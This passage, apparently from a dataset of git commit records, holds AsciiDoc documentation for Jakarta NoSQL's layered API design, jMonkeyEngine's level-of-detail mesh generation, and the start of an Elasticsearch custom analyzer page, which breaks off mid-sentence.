The new Jakarta NoSQL API proposal is going to be a bridge between the logic tier and the data tier. To do this, we need to create two APIs: one to communicate to a database and another one to be a high abstraction to the Java application.\n\nIn software, there are structures: tiers, physical structures, and layers. The multi-tier application has three levels:\n\n* **Presentation** tier: Has a primary duty to translate results so the user can understand.\n* **Logic tier**: Has all business rules, processes, conditions, saved information, etc. This level moves and processes information between other levels.\n* **Data tier**: Retrieves and stores information in either a database or a system file.\n\nimage::tiers.png[Tiers from a classic application structure]\n\nTalking more precisely about the physical layer and the logic to separate responsibilities, there are other layers.\n\nThe logic tier, where the application and the business rules stay, has additional layers:\n\n* **Application layer**: The bridge between the view tier and logic tier, e.g. converting an object into either JSON or HTML.\n* **Service layer**: The service layer; this can be either a Controller or a Resource.\n* **Business Layer**: This is the part of the program that encodes the real-world business or domain rules that determine how data will be created, stored, and changed.\n* **Persistence Layer**: This is a layer that provides simplified access to data stored in persistent storage of some kind.\n\nimage::logic_tier.png[Logic tier on details]\n\nWithin the persistence layer there are further structures, such as the Data Access Object (DAO). This structure connects the business layer and the persistence layer; inside, it holds the API that talks to the database. Currently, there is a difference here between SQL and NoSQL databases:\n\nIn the relational database world, there are two mechanisms under the DAO, JDBC and JPA:\n\n\n* **JDBC**: a deep layer with a database that has communications, underlying transactions, and is basically a driver to a particular database.\n* **JPA**: A high layer that communicates with the database through JDBC. This layer has a high mapping to Java; this place has annotations and an EntityManager. In general, JPA has integrations with other specifications, such as CDI and Bean Validation.\n\nA considerable advantage of this strategy is that a change, to either JDBC or JPA, can happen quickly. When you change a database, you only need to switch to the respective driver for that database, and then you're done! The code is ready for a new database change.\n\n.A usual Java application with JPA layer architecture\nimage::jpa.png[A usual Java application with JPA layer architecture]\n\nIn a NoSQL database, there is no such strategy to preserve code and keep the impact of a change small. All APIs are different and don't follow any one standard, so one change to a new database can result in a lot of work.\n\n* The database vendor needs to be worried about the high-level mapping to the Java world, and the solution provider needs to be concerned about the low level of communication with a particular database.\n* The database vendor needs to \u201ccopy\u201d these communication solutions to all Java vendors.\n* To a Java developer, there are two lock-in types: If a developer uses an API directly, a database change loses code.
If a developer uses high-level mapping, they are locked into a Java solution, because if that high level doesn't support a particular NoSQL database, the developer needs to change to another Java solution or use a NoSQL API directly.\n\n\n.A NoSQL Java application that has lock-in to each NoSQL provider\nimage::nosql_issue.png[A NoSQL Java application that has lock-in to each NoSQL provider]\n\nA wise recommendation might be to use the JPA, because the developer already knows this standard SQL API and could apply the same API to a NoSQL database. However, using an API with SQL concepts in NoSQL is the same as using a knife as a spoon; the result is a disaster! Furthermore, the NoSQL world has diversity, with several data structures and particular behavior for each provider, and both matter in a software solution. Indeed, the merge strategy of using just one API is still a discussion nowadays.\n\nA good point about using NoSQL, and consequently polyglot persistence, is that data storage is about choice. When a database offers gains, it sacrifices other aspects; it is the CAP theorem slamming the door. Hence, an API generic enough to encapsulate all kinds of databases might be useless.\n\nThe history between Java and NoSQL has several solutions that can be split in two:\n\n1. NoSQL Drivers\n2. Mapper\n * Mapper Agnostic\n * Mapper Specific\n\nThe first one is the driver API; this API has a low communication level, and is to NoSQL what JDBC is to SQL. It guarantees full power over the NoSQL database and semantics closer to the database. However, it requires more code to bridge results to the entity domain, portability is quite low, and the learning curve is therefore steeper.\n\nThe Object Mapper lets the developer work in terms of domains, thus it can help a developer follow good practices. A mapper may be specific, which means that the mapper is made for a particular database, so the mapper will support all the database features, but at the price of a lock-in API. On the other hand, there is the agnostic mapper that uses a generic API to encapsulate the database API, which gives a developer one API to connect to several databases; however, it tends either to not cover numerous features in a database, or to not cover many databases.\n\nThe rapid adoption of NoSQL combined with the vast assortment of implementations has driven a desire to create a set of standardized APIs. In the Java world, this was initially proposed in an effort by Oracle to define a NoSQL API for Java EE 9. The justification for the definition of a new API, separate from JDBC and JPA, was the following:\n\n* JPA was not designed with NoSQL in mind\n* A single set of APIs or annotations isn\u2019t adequate for all database types\n* JPA over NoSQL implies the inconsistent use of annotations\n* The diversity in the NoSQL world matters\n\nUnfortunately, what Oracle proposed for Java EE 9 was not completed when Java EE was donated to the Eclipse Foundation.\n\nTo bring innovation under the Jakarta EE umbrella, Jakarta NoSQL was born. The goal of this specification is to ease integration between Java applications and NoSQL databases, with a standard API to work with different types and vendors of NoSQL databases. To achieve this, the spec has two APIs that work like layers; each layer has a specific goal, and they can integrate with each other or be used in isolation:\n\n* **Communication API**: Exactly what JDBC is to SQL. This API has four specializations, one for each type of database (column, document, key-value and graph). The specializations are independent of each other, optional from the point of view of the database vendor, and have their specific TCKs.\n* **Mapping API**: This layer is based on Annotations, analogous to JPA and CDI, and preserves integration with other Jakarta EE technologies like Bean Validation and so on.\n
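\nTo give a flavor of the communication layer, here is a minimal, hedged sketch for a document database. The type names follow the project's communication API as the text describes it, but treat them (especially the `manager` object and the `insert` method) as illustrative assumptions rather than a confirmed contract:\n\n[source,java]\n----\n\/\/ Hedged sketch: driver-level communication with a document database.\n\/\/ DocumentEntity and Document are communication-API types; \"manager\" is\n\/\/ assumed to be a document collection manager obtained from a provider driver.\nDocumentEntity entity = DocumentEntity.of(\"person\");\nentity.add(Document.of(\"name\", \"Ada\"));\nentity.add(Document.of(\"age\", 30));\nmanager.insert(entity);\n----\n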
\nJakarta EE NoSQL is the first specification of its kind in the Java enterprise. As with any Java specification, it analyzes solutions that already exist, checks the history with both success and failure cases, and then goes in a direction that has a lesser number of trade-offs in an API architecture. The divide and conquer method fits well with the layers, communication, mapping, and NoSQL types. Thus, it will provide a straightforward specification with light maintenance; it will define the scope of each API; and it will work better in extensibility, since the particular features of each NoSQL database matter.\n\nJakarta EE has a bright future with a significant integration with the community and open source. More transparency, after all, is the most meaningful power of Jakarta. It's not the technology itself, but the heart of the community; therefore, the success is in the hands of each developer.","old_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== The main idea behind the API\n\nOnce we talked about the importance of a standard NoSQL database API, the next step is to discuss the API in more detail. However, to make a natural explanation, we are first going to talk about both layers and tiers. These structure levels make communication and maintenance clearer and split the responsibility. The new API proposal is going to be responsible for being a bridge between the logic tier and data tier; to do this, we need to create two APIs - one to communicate to a database and another one to be a high abstraction to the Java application.\n\n\nIn software, it is common for an application to have structures: tiers (the physical structure) and layers (the logical one). The multi-tier application has three levels:\n\n* **Presentation tier**: This, as its primary duty, translates the results from the tiers below into something the user can understand.\n\n* **Logic tier**: The tier that has all business rules, processes, conditions, etc. This level moves and processes information between other levels.\n\n* **Data tier**: Stores and retrieves information, either in a database or a system file.\n\nTalking more precisely about the logical separation of responsibilities within the physical tiers, there are layers.\n\nThe logic tier, where the application and the business rules stay,
has these layers:\n\n\n* *Application layer*: The bridge between the view tier and logic tier, e.g., converting an object into either JSON or HTML.\n* *Service layer*: The service layer; this can be either a Controller or a Resource.\n* *Business Layer*: Where the whole business and the domain model live.\n* *Persistence Layer*: The platform between the logic tier and data tier. This layer has an integration structure such as a DAO or repository.\n\nWithin the persistence layer there are further structures, such as the Data Access Object (DAO). This structure connects the business layer and the persistence layer, and inside it has the API that talks to the database. Currently, there is a difference here between SQL and NoSQL databases:\n\nIn the relational database world, there are two mechanisms beyond the DAO: JDBC and JPA.\n\n* *JDBC*: A deep layer with a database that has communications and basic transactions; basically, it's a driver to a particular database.\n* *JPA*: A high layer that communicates with the database through JDBC. This layer has a high mapping to Java; this place has annotations and an EntityManager. In general, JPA has integration with other specifications such as CDI and Bean Validation.\n\nA huge advantage of this strategy is that a change, to either JDBC or JPA, can happen quickly. When a developer changes a database, he just needs to switch to the respective driver for that database, and done! The code is ready for the new database.\n\n\n.A usual Java application with JPA layer architecture\nimage::jpa.png[A usual Java application with JPA layer architecture]\n\nIn a NoSQL database, there isn\u2019t a strategy to preserve code or to keep the impact of a change small. All APIs are different and don\u2019t follow any one standard, so one change to a new database results in a lot of work. There are some solutions, such as Spring Data, Hibernate OGM, and TopLink NoSQL, but only at a high level. In other words, if such a high-level API has no support for a particular database, the result is going to be either changing the high-level API or using the API from the NoSQL database directly; so, a loss of a lot of code. This solution has several issues:\n\n* The database vendor needs to be worried about the high-level mapping to the Java world\n* The solution provider needs to be concerned about the low level of communication with a particular database. The database vendor needs to \u201ccopy\u201d these communication solutions to all Java vendors.\n* To a Java developer, there are two lock-in types: If a developer uses an API directly, a change will lose code. If a developer uses a high-level mapping, this developer is locked into a Java solution, because if this high level doesn\u2019t have support for a particular NoSQL database, the developer needs to change to another Java solution or use a NoSQL API directly.\n\n\n.A NoSQL Java application that has lock-in to each NoSQL provider\nimage::nosql_issue.png[A NoSQL Java application that has lock-in to each NoSQL provider]\n\nTo solve this problem, the API should have two layers:\n\n* The communication layer: the driver for a particular database that connects Java to the actual database. This layer has four specializations, one for each NoSQL type.\n* The mapping level: its duty is to bring high-level concepts to Java developers; this layer has annotations and integration with other specifications.\n\nThese APIs are optional to each other. In other words, a Java mapping solution just needs to implement the mapping API, and the database vendors need to implement the communication API.\n
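\nAs a hedged illustration of what the annotation-based mapping level looks like from the developer's side, here is a minimal entity. The annotation names (`@Entity`, `@Id`, `@Column`) follow the JPA-like, annotation-driven style this text describes, and should be read as a sketch rather than the final API:\n\n[source,java]\n----\n\/\/ Illustrative entity for the mapping level; a CDI-managed mapper would\n\/\/ convert this object to and from the communication layer's entities.\n@Entity(\"Person\")\npublic class Person {\n\n    @Id\n    private Long id;\n\n    @Column\n    private String name;\n}\n----\n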
\n=== Eclipse JNoSQL\n\nEclipse JNoSQL is a set of tools to make integration easy between Java applications and NoSQL databases. JNoSQL has a standard API. However, NoSQL databases are diverse, even when two of them are the same type. E.g., the two column family databases HBase and Cassandra each have particular behaviors and resources that make them individual, such as the Cassandra Query Language and the consistency levels that exist only in Cassandra. So, the API must be extensible and configurable to also have support for specific databases. To solve this problem, the project is going to have two layers:\n\n* **Communication API**: An API just to communicate with the database, exactly what JDBC does for SQL. This API is going to have four specializations, one for each kind of database.\n* **Mapping API**: An API to do the best integration with the Java developer. It is going to be annotation driven and is going to have integration with other technologies like Bean Validation, etc.\n\n.Eclipse JNoSQL\nimage::jnosql.png[Eclipse JNoSQL]\n\n==== Communication API\n\nThe communication layer is the low-level API; in other words, it communicates with the NoSQL databases. This project is going to work as a driver to NoSQL databases. Overall, it has four APIs inside, three new APIs plus Apache TinkerPop for graphs, one for each NoSQL kind, each with its own TCK. A test compatibility kit, the TCK, is a test suite that makes sure an implementation does support its database.\n\n\n==== Mapping API\n\n\nThe Mapping API is the integration and mapping layer. In other words, it takes the communication level and integrates it with other technologies such as Bean Validation, and also with an entity model. It has a CDI engine.\n\nAs the communication layer does, mapping also has an API for each database flavor. Using CDI as the engine, each component is configurable, and it has features such as:\n\n\n* Persist an object through annotations\n* Make any component replaceable (reflections, entity conversions, cache, persistence lifecycle and more).\n* Observe events: a persistence database lifecycle (each database kind has individual events).\n\nAn important point about CDI events is how easily they let you create and add new functionality without changing the core code; for example, it is easy to use Bean Validation just by listening to an event.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ae65701924372d657c726595f6d6a0ad3e5da9d","subject":"fix refs","message":"fix refs\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/level_of_detail.adoc","new_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/level_of_detail.adoc","new_contents":"= Level of Detail (LOD) Optimization\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n:uri-jme3: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\n\n\nA mesh with a high level of detail has lots of polygons and looks good close up. But when the mesh is further away (and the detail is not visible), the high-polygon count slows down performance unnecessarily.\n\nOne solution for this problem is to use high-detail meshes for objects close to the camera, and low-detail meshes for objects far from the camera.
As the player moves through the scene, you must keep replacing close objects by more detailed meshes, and far objects by less detailed meshes. The goal is to keep few high-quality slow-rendering objects in the foreground, and many low-quality fast-rendering objects in the background. (Experienced users can compare this approach to xref:jme3\/advanced\/terrain.adoc[JME's TerraMonkey terrain system], which internally uses the specialized GeoMipMapping algorithm to generate a terrain's Levels of Detail.)\n\nYou see now why you may want to be able to generate Levels of Detail for complex Geometries automatically. JME3 supports a Java implementation of the Ogre engine's LOD generator (originally by P\u00e9ter Sz\u00fccs and Stan Melax): You use link:{uri-jme3}\/jme3-core\/src\/tools\/java\/jme3tools\/optimize\/LodGenerator.java[jme3tools.optimize.LodGenerator] in conjunction with link:{uri-jme3}\/jme3-core\/src\/main\/java\/com\/jme3\/scene\/control\/LodControl.java[com.jme3.scene.control.LodControl].\n\nFor a demo, run link:{uri-jme3}\/jme3-examples\/src\/main\/java\/jme3test\/stress\/TestLodGeneration.java[TestLodGeneration.java] from xref:sdk:sample_code.adoc[JmeTests], then press +\/- and spacebar to experiment. The following screenshots show a monkey model with three reduced Levels of Detail:\n\nimage::jme3\/advanced\/jmonkey-lod.gif[jmonkey-lod.gif,width=\"\",height=\"\",align=\"center\"]\n\n\n\n== Usage\n\nTo activate this optimization:\n\n. Pick a reduction method and values for the Geometry. (Trial and error\u2026)\n. Generate LODs for the Geometry, either in the SDK or in code.\n. Add an LOD control to the Geometry.\n\n\n== Pick Reduction Methods and Values\n\nThere are several reduction methods to generate a low-polygon version from a high-polygon model. Don't worry, the reduction does not modify the original model.\n[cols=\"35,55,10\", options=\"header\"]\n|===\n\na|Reduction Method\na|Description\na|Reduction Value\n\na|LodGenerator.TriangleReductionMethod.COLLAPSE_COST\na|Collapses polygon vertices from the mesh until the reduction cost (= amount of ugly artifacts caused) exceeds the given threshold.\na|0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.PROPORTIONAL\na|Removes the given percentage of polygons from the mesh.\na| 0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.CONSTANT\na|Removes the given number of polygons from the mesh.\na| integer\n\n|===\n\nIf you don't know which to choose, experiment. For example start by trying COLLAPSE_COST and .5f-.9f.\n\n\n== Generate LOD\n\nYou must generate and cache several LODs for each mesh, ranging from many to few polygons. The LOD generator algorithm attempts to collapse vertices automatically, while avoiding ugly artifacts. The LOD generator doesn't generate new meshes, it only creates separate reduced index buffers for the more highly reduced levels.\n\n* If you create geometries manually (3D models), use the SDK to generate LODs.\n* If you create geometries programmatically, generate LODs from your Java code.\n\n\n=== Generating LODs in the SDK\n\nThe SDK contains a user-friendly interface to generate LODs for a model (.j3o file).\n\n. Open the Projects or Files window.\n. Select the .j3o file in the `Project Assets\/Models` directory.\n. Choose `menu:Window[Edit in SceneExplorer]` if the SceneExplorer is not open. Info about the selected model is now displayed in the SceneExplorer.\n. btn:[RMB] select the model in SceneExplorer. Choose the `menu:Tools[Generate Levels of Detail]` menu. 
+\nimage:jme3\/advanced\/jme-sdk-generate-lod-menu.png[The Tools Generate LOD context menu in the SceneExplorer,width=\"300\",height=\"180\"]\n. The `Generate LOD` settings wizard opens: +\nimage:jme3\/advanced\/jme-sdk-generate-lod-window.png[The Generate LOD settings wizard,width=\"300\",height=\"150\"]\n. Choose a reduction method and reduction values for one or more levels.\n+\n[TIP]\n====\nEnter higher reduction values for higher levels.\n====\n\n. Click btn:[Finish] to generate the LODs for this model.\n\nThe LODs are saved in the .j3o model file.\n\n\n[TIP]\n====\nChoose `menu:Window[Properties]` if the Properties window is not open. Choose the generated LODs from the dropdown in the Properties window, and verify their quality in the SceneComposer.\n====\n\n\n\nimage::jme3\/advanced\/jme-sdk-generate-lod-full.png[jme-sdk-generate-lod-full.png,width=\"\",height=\"\",align=\"center\"]\n\n\n\n=== Generating LODs in Code\n\nThe `jme3tools.optimize.LodGenerator` utility class helps you generate LODs for an arbitrary mesh (a Geometry object) programmatically from your Java code. You create and bake one LodGenerator for each Geometry.\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(geometry);\nlod.bakeLods(reductionMethod,reductionValue);\n----\n\nThe LODs are stored inside the Geometry object.\n\n*Example:* How to generate an LOD of myPrettyGeo's mesh with the same settings as used in the SDK example above:\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(myPrettyGeo);\nlod.bakeLods(LodGenerator.TriangleReductionMethod.PROPORTIONAL, 0.25f, 0.5f, 0.75f);\n----\n\n\n== Activate the LOD Control\n\nAfter generating the LODs for the geometry, you create and add a `com.jme3.scene.control.LodControl` to the geometry. Adding the LodControl activates the LOD optimization for this geometry.\n\n[source,java]\n----\nLodControl lc = new LodControl();\nmyPrettyGeo.addControl(lc);\nrootNode.attachChild(myPrettyGeo);\n----\n\nThe LodControl internally gets the camera from the game's viewport to calculate the distance to this geometry.
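\nFor intuition only, here is a hedged sketch of the kind of per-frame, distance-based check such a control performs. The 50-unit band size is an invented example, and the snippet assumes the engine's `Geometry.setLodLevel(int)` and `Mesh.getNumLodLevels()` methods; it is not the engine's actual implementation:\n\n[source,java]\n----\n\/\/ Somewhere with access to the camera and the geometry, once per frame:\nfloat distance = cam.getLocation().distance(myPrettyGeo.getWorldTranslation());\nint numLevels = myPrettyGeo.getMesh().getNumLodLevels();\n\n\/\/ Illustrative thresholds: one 50-unit distance band per generated level.\nint level = Math.min(numLevels - 1, (int) (distance \/ 50f));\nmyPrettyGeo.setLodLevel(level); \/\/ 0 = full detail, higher = fewer polygons\n----\n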
Depending on the distance, the LodControl selects an appropriate level of detail, and passes more (or less) detailed vertex data to the renderer.\n\n\n== Impact on Quality and Speed\n[cols=\"10,30,20,20,20\", options=\"header\"]\n|===\n\na|Level number\na|Purpose\na|Distance\na|Rendering Speed\na|Rendering Quality\n\na|Level 0\na|The original mesh is used automatically for close-ups, and it's the default if no LODs have been generated.\na|Closest\na|Slowest.\na|Best.\n\na|Level 1 +\nLevel 2 +\nLevel 3\na|If you generated LODs, JME3 uses them automatically as soon as the object moves into the background.\na|The higher the level, +\nthe further away.\na|The higher the level, +\nthe faster.\na|The higher the level, +\nthe lower the quality.\n\n|===\n\n\n== See also\n\n* link:https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341[https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341]\n* link:https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod[https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod]\n* link:http:\/\/www.melax.com\/polychop[http:\/\/www.melax.com\/polychop]\n* link:http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf[http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf]\n* xref:jme3\/advanced\/terrain.adoc[JME3 TerraMonkey Terrain]\n","old_contents":"= Level of Detail (LOD) Optimization\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\n:uri-jme3: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nA mesh with a high level of detail has lots of polygons and looks good close up. But when the mesh is further away (and the detail is not visible), the high-polygon count slows down performance unnecessarily.\n\nOne solution for this problem is to use high-detail meshes for objects close to the camera, and low-detail meshes for objects far from the camera. As the player moves through the scene, you must keep replacing close objects by more detailed meshes, and far objects by less detailed meshes. The goal is to keep few high-quality slow-rendering objects in the foreground, and many low-quality fast-rendering objects in the background. (Experienced users can compare this approach to <<jme3\/advanced\/terrain#,JME's TerraMonkey terrain system>>, which internally uses the specialized GeoMipMapping algorithm to generate a terrain's Levels of Detail.)\n\nYou see now why you may want to be able to generate Levels of Detail for complex Geometries automatically. JME3 supports a Java implementation of the Ogre engine's LOD generator (originally by P\u00e9ter Sz\u00fccs and Stan Melax): You use link:{uri-jme3}\/jme3-core\/src\/tools\/java\/jme3tools\/optimize\/LodGenerator.java[jme3tools.optimize.LodGenerator] in conjunction with link:{uri-jme3}\/jme3-core\/src\/main\/java\/com\/jme3\/scene\/control\/LodControl.java[com.jme3.scene.control.LodControl].\n\nFor a demo, run link:{uri-jme3}\/jme3-examples\/src\/main\/java\/jme3test\/stress\/TestLodGeneration.java[TestLodGeneration.java] from <<sdk\/sample_code#,JmeTests>>, then press +\/- and spacebar to experiment. The following screenshots show a monkey model with three reduced Levels of Detail:\n\nimage::jme3\/advanced\/jmonkey-lod.gif[jmonkey-lod.gif,width=\"\",height=\"\",align=\"center\"]\n\n\n\n== Usage\n\nTo activate this optimization:\n\n. Pick a reduction method and values for the Geometry. 
(Trial and error\u2026)\n. Generate LODs for the Geometry, either in the SDK or in code.\n. Add an LOD control to the Geometry.\n\n\n== Pick Reduction Methods and Values\n\nThere are several reduction methods to generate a low-polygon version from a high-polygon model. Don't worry, the reduction does not modify the original model.\n[cols=\"35,55,10\", options=\"header\"]\n|===\n\na|Reduction Method\na|Description\na|Reduction Value\n\na|LodGenerator.TriangleReductionMethod.COLLAPSE_COST\na|Collapses polygon vertices from the mesh until the reduction cost (= amount of ugly artifacts caused) exceeds the given threshold.\na|0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.PROPORTIONAL\na|Removes the given percentage of polygons from the mesh.\na| 0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.CONSTANT\na|Removes the given number of polygons from the mesh.\na| integer\n\n|===\n\nIf you don't know which to choose, experiment. For example start by trying COLLAPSE_COST and .5f-.9f.\n\n\n== Generate LOD\n\nYou must generate and cache several LODs for each mesh, ranging from many to few polygons. The LOD generator algorithm attempts to collaps vertices automatically, while avoiding ugly artifacts. The LOD generator doesn't generate new meshes, it only creates separate reduced index buffers for the more highly reduced levels.\n\n* If you create geometries manually (3D models), use the SDK to generate LODs.\n* If you create geometries programmatically, generate LODs from your Java code.\n\n\n=== Generating LODs in the SDK\n\nThe SDK contains a user-friendly interface to generate LODs for a model (.j3o file).\n\n. Open the Projects or Files window.\n. Select the .j3o file in the `Project Assets\/Models` directory.\n. Choose `menu:Window[Edit in SceneExplorer]` if the SceneExplorer is not open. Info about the selected model is now displayed in the SceneExplorer.\n. btn:[RMB] select the model in SceneExplorer. Choose the `menu:Tools[Generate Levels of Detail]` menu. +\nimage:jme3\/advanced\/jme-sdk-generate-lod-menu.png[The Tools Generate LOD context menu in the SceneExplorer,width=\"300\",height=\"180\"]\n. The `Generate LOD` settings wizard opens: +\nimage:jme3\/advanced\/jme-sdk-generate-lod-window.png[The Generate LOD settings wizard,width=\"300\",height=\"150\"]\n. Choose a reduction method and reduction values for one or more levels.\n+\n[TIP]\n====\nEnter higher reduction values for higher levels.\n====\n\n. Click btn:[Finish] to generate the LODs for this model.\n\nThe LODs are saved in the .j3o model file.\n\n\n[TIP]\n====\nChoose `menu:Window[Properties]` if the Properties window is not open. Choose the generated LODs from the dropdown in the Properties window, and verify their quality in the SceneComposer.\n====\n\n\n\nimage::jme3\/advanced\/jme-sdk-generate-lod-full.png[jme-sdk-generate-lod-full.png,width=\"\",height=\"\",align=\"center\"]\n\n\n\n=== Generating LODs in Code\n\nThe `jme3tools.optimize.LodGenerator` utility class helps you generate LODs for an arbitrary mesh (a Geometry object) programmatically from your Java code. 
You create and bake one LodGenerator for each Geometry.\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(geometry);\nlod.bakeLods(reductionMethod,reductionValue);\n----\n\nThe LODs are stored inside the Geometry object.\n\n*Example:* How to generate an LOD of myPrettyGeo's mesh with the same settings as used in the SDK example above:\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(myPrettyGeo);\nlod.bakeLods(LodGenerator.TriangleReductionMethod.PROPORTIONAL,0.25, 0.5f, 0.75f);\n----\n\n\n== Activate the LOD Control\n\nAfter generating the LODs for the geometry, you create and add a `com.jme3.scene.control.LodControl` to the geometry. Adding the LodControl activates the LOD optimizaton for this geometry.\n\n[source,java]\n----\nLodControl lc = new LodControl();\nmyPrettyGeo.addControl(lc);\nrootNode.attachChild(myPrettyGeo);\n----\n\nThe LodControl internally gets the camera from the game's viewport to calculate the distance to this geometry. Depending on the distance, the LodControl selects an appropriate level of detail, and passes more (or less) detailed vertex data to the renderer.\n\n\n== Impact on Quality and Speed\n[cols=\"10,30,20,20,20\", options=\"header\"]\n|===\n\na|Level number\na|Purpose\na|Distance\na|Rendering Speed\na|Rendering Quality\n\na|Level 0\na|The original mesh is used automatically for close-ups, and it's the default if no LODs have been generated.\na|Closest\na|Slowest.\na|Best.\n\na|Level 1 +\nLevel 2 +\nLevel 3\na|If you generated LODs, JME3 uses them automatically as soon as the object moves into the background.\na|The higher the level, +\nthe further away.\na|The higher the level, +\nthe faster.\na|The higher the level, +\nthe lower the quality.\n\n|===\n\n\n== See also\n\n* link:https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341[https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341]\n* link:https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod[https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod]\n* link:http:\/\/www.melax.com\/polychop[http:\/\/www.melax.com\/polychop]\n* link:http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf[http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf]\n* <<jme3\/advanced\/terrain#,JME3 TerraMonkey Terrain>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d7d91085ce04ccc65dc638af0228500c6f6993f6","subject":"[DOCS] Correct custom analyzer callouts (#46030)","message":"[DOCS] Correct custom analyzer callouts (#46030)\n\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/analysis\/analyzers\/custom-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/custom-analyzer.asciidoc","new_contents":"[[analysis-custom-analyzer]]\n=== Custom Analyzer\n\nWhen the built-in analyzers do not fulfill your needs, you can create a\n`custom` analyzer which uses the appropriate combination of:\n\n* zero or more <<analysis-charfilters, character filters>>\n* a <<analysis-tokenizers,tokenizer>>\n* zero or more <<analysis-tokenfilters,token filters>>.\n\n[float]\n=== Configuration\n\nThe `custom` analyzer accepts the following parameters:\n\n[horizontal]\n`tokenizer`::\n\n A built-in or customised <<analysis-tokenizers,tokenizer>>.\n (Required)\n\n`char_filter`::\n\n An optional array of built-in or customised\n 
<<analysis-charfilters, character filters>>.\n\n`filter`::\n\n An optional array of built-in or customised\n <<analysis-tokenfilters, token filters>>.\n\n`position_increment_gap`::\n\n When indexing an array of text values, Elasticsearch inserts a fake \"gap\"\n between the last term of one value and the first term of the next value to\n ensure that a phrase query doesn't match two terms from different array\n elements. Defaults to `100`. See <<position-increment-gap>> for more.\n\n[float]\n=== Example configuration\n\nHere is an example that combines the following:\n\nCharacter Filter::\n* <<analysis-htmlstrip-charfilter,HTML Strip Character Filter>>\n\nTokenizer::\n* <<analysis-standard-tokenizer,Standard Tokenizer>>\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-asciifolding-tokenfilter,ASCII-Folding Token Filter>>\n\n[source,js]\n--------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\", <1>\n \"tokenizer\": \"standard\",\n \"char_filter\": [\n \"html_strip\"\n ],\n \"filter\": [\n \"lowercase\",\n \"asciifolding\"\n ]\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"Is this <b>d\u00e9j\u00e0 vu<\/b>?\"\n}\n--------------------------------\n\/\/ CONSOLE\n\n<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer.\n Compare this to how <<configuring-analyzers,built-in analyzers can be configured>>:\n `type` will be set to the name of the built-in analyzer, like\n <<analysis-standard-analyzer,`standard`>> or <<analysis-simple-analyzer,`simple`>>.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"is\",\n \"start_offset\": 0,\n \"end_offset\": 2,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"this\",\n \"start_offset\": 3,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n },\n {\n \"token\": \"deja\",\n \"start_offset\": 11,\n \"end_offset\": 15,\n \"type\": \"<ALPHANUM>\",\n \"position\": 2\n },\n {\n \"token\": \"vu\",\n \"start_offset\": 16,\n \"end_offset\": 22,\n \"type\": \"<ALPHANUM>\",\n \"position\": 3\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ is, this, deja, vu ]\n---------------------------\n\nThe previous example used tokenizer, token filters, and character filters with\ntheir default configurations, but it is possible to create configured versions\nof each and to use them in a custom analyzer.\n\nHere is a more complicated example that combines the 